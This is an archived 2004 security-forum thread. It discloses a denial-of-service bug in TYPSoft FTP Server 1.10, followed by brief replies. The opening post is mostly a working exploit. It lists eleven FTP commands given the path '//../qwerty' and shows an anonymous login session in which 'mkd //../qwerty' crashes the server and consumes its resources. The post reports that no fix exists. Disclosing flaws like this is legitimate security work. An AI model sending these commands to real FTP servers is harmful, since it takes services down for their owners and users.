hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Nexcess
Feb 24 2004, 11:43 PM
CODE


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"TYPSoft FTP Server is a fast and easy ftp server with support to
Standard FTP Command, Clean interface, Virtual File System
architecture, ability to resume Download and Upload, IP Restriction,
Login/Quit message, logs, Multi Language and many other things."

***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

TYPSoft FTP Server may be DoS'ed with standart ftp commands:
mkd, xmkd, dele, size, retr, stor, appe, rnfr, rnto, rmd, xrmd.
With parameter "//../qwerty", like that:

mkd //../qwerty
xmkd //../qwerty
dele //../qwerty
size //../qwerty
retr //../qwerty
stor //../qwerty
appe //../qwerty
rnfr //../qwerty
rnto //../qwerty
rmd //../qwerty
xrmd //../qwerty

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

To test the vulnerability:

-----------------------------------------------------------------------
220 TYPSoft FTP Server 1.10 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
mkd //../qwerty
-----------------------------------------------------------------------

and the ftp server will be DoS'ed + 100% employment of computer resources.


/*Tested on: Win XP Build 2600, Service Pack: None
            Win XP Build 2600, Service Pack: SP1*/

***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

Not exist.

***********************************************************************

tba
Feb 25 2004, 12:57 AM
damn dos exploits :@
Pro21
Feb 25 2004, 08:03 AM
happy.gif

Hihi DOS P@W@

Thx
stonebreaker
Feb 26 2004, 05:16 AM
but there is no shell dry.gif

DvilleStoner
Feb 26 2004, 07:09 AM
haha, very funny stuff
stonebreaker
Feb 29 2004, 03:21 AM
i use TYPSoft FTP Server all along
because it is very simple config it is very easy hehe
now after read this article i will change one or update it
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.